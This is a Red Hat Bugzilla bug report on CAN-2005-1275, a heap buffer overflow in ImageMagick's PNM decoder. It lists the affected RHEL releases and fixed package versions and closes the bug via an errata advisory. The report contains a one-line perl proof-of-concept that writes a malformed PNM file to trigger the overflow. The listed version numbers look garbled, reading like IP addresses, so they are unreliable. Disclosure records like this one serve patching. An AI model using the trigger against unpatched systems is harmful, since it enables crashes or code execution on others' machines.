Red Hat Bugzilla – Bug 155953
CAN-2005-1275 ImageMagick PNM heap overflow
Last modified: 2007-11-30 17:07:17 EST
A heap based buffer overflow exists in ImageMagick's PNM decoder.
Here's exploit (in the event the website vanishes)
perl -e 'print "P7\n1\n1 1\n1"' > vuln.pnm
This issue also affects RHEL3
18.104.22.168-11 contains the fix for RHEL4
22.214.171.124 for RHEL3
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.